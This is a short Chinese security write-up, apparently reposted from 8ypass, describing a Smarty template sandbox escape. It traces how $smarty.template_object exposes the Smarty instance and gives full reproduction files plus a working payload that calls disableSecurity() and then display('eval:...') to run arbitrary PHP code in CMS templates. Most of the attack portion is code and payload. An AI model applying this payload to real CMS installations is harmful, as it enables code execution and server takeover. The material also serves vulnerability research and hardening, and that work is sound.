0x00
smarty模板引擎嵌套在cms中,默认cms会开启沙箱模式(enableSecurity),会导致无法在tpl模板中执行php函数
0x01
根据官方提示禁止在沙箱模式下返回template_object,搜索
case 'template_object':return '$_smarty_tpl';
返回一个$_smarty_tpl,smarty_tpl返回的是Smarty_Internal_Template类实例
class Smarty_Internal_Template extends Smarty_Internal_TemplateBase{public $smarty = null;public function __construct($template_resource,Smarty $smarty,Smarty_Internal_Data $_parent = null,$_cache_id = null,$_compile_id = null,$_caching = null,$_cache_lifetime = null,$_isConfig = false) {$this->smarty=$smarty;
其中smarty对应Smarty类
class Smarty extends Smarty_Internal_TemplateBase{public function enableSecurity($security_class = null){Smarty_Security::enableSecurity($this, $security_class);return $this;}public function disableSecurity(){$this->security_policy = null;return $this;}
而smarty类中开启沙箱和关闭沙箱方法正好在同一个类中,这里可以通过disableSecurity关闭沙箱方法后调用父类的display执行任意代码
abstract class Smarty_Internal_TemplateBase extends Smarty_Internal_Data{public function display($template = null, $cache_id = null, $compile_id = null, $parent = null){
复现:
smarty.inc.php
<?phpdefine('ROOT_PATH', dirname(__FILE__).'/');require_once ROOT_PATH.'smarty/Smarty.class.php';class security extends Smarty_Security{// 禁用所有php函数public $php_functions = null;public $php_handling = Smarty::PHP_REMOVE;public $modifiers = array();}$_smarty=new Smarty();$_smarty->enableSecurity('security'); //开启沙箱$_smarty->template_dir='./template/';$_smarty->compile_dir='./template_c/';$_smarty->config_dir='./config/';$_smarty->cache_dir='./cache/';$_smarty->left_delimiter = '{';
test.php
<?phprequire_once 'smarty.inc.php';
$_smarty->display('index.tpl');
index.tpl
{phpinfo()}
由于开启了沙箱,执行结果会报如下
"{phpinfo()}" PHP function 'phpinfo' not allowed by security setting
通过如下payload 关闭沙箱执行:
{$smarty.template_object->smarty->disableSecurity()->display('eval:{phpinfo()}')}
PS:利用需要具有编辑tpl模板权限
文章转载自8ypass,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
